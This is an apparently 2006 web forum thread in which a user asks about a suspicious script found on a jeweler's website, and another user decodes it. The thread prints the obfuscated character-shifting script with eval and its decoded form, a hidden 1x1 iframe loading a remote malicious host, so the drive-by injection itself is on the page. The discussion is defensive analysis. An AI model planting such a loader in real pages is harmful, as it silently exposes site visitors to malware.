malicious script?

[Jack Mahon]

Hello,

a friend visited a commercial jeweler's website and somehow got a virus
warning on her computer ("win32/worfo").

I checked out the site in question, but could find nothing on the home page
code except the last line in the source code, located after the body
end-tag.

The line is this:
<script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu>2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy2?=0jgsbnf?#*<';o='';for(i=0;i<113;i++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>

I don't have a clue what this means. Can anyone help?

thanks,

Jack M

 

[BootNic]

Hello,

a friend visited a commercial jeweler's website and somehow got a
virus warning on her computer ("win32/worfo").

I checked out the site in question, but could find nothing on the
home page code except the last line in the source code, located
after the body end-tag.

The line is this:
<script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu>2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy2?=0jgsbnf?#*<';o='';for(i=0;i<113;i++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>

I don't have a clue what this means. Can anyone help?

Looks like it adds a hidden iframe.

document.write("<iframe style='display:none' width=1 height=1 src='http://trust4free.ws/?id=index19'></iframe>");

 

[gerg]

Looks like it adds a hidden iframe.

document.write("<iframe style='display:none' width=1 height=1 src='http://trust4free.ws/?id=index19'></iframe>");

How in the world did you derive that? Not doubting your ability, but it
looked like total gibberish.

-g-

 

[BootNic]

How in the world did you derive that? Not doubting your ability,
but it looked like total gibberish.

Replace eval(o); with alert(o);

--
BootNic Monday, March 27, 2006 9:04 PM

"I've noticed that the press tends to be quite accurate, except when
they're writing on a subject I know something about."
*Keith F. Lynch*